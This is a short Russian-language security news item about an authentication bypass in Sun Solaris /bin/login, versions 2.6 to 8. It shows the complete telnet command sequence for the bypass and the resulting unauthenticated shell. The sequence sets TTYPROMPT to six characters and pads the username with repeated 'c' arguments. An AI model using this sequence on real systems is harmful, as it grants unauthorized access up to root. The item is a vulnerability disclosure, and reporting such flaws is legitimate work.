В Sun Solaris обнаружен тривиальный метод обхода идентификации в /bin/login. Уязвимость позволяет удаленному атакующему получить неавторизованный локальный доступ под любым пользователем, в т.ч. и root. Для успешной эксплуатации достаточно определить переменную TTYPROMPT, равную 6 символам, в процессе телнет сессии. Скорее всего проблема связанна с переполнением буфера: 

Пример: 

telnet> environ define TTYPROMPT abcdef 
telnet> o localhost 

SunOS 5.8 

bin c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c c\n 
Last login: whenever 
$ whoami 
bin 

Уязвимость обнаружена в Sun Solaris 2.6-8.0.

  • Подпишись на наc в Telegram!

    Только важные новости и лучшие статьи

    Подписаться

  • Подписаться
    Уведомить о
    0 комментариев
    Межтекстовые Отзывы
    Посмотреть все комментарии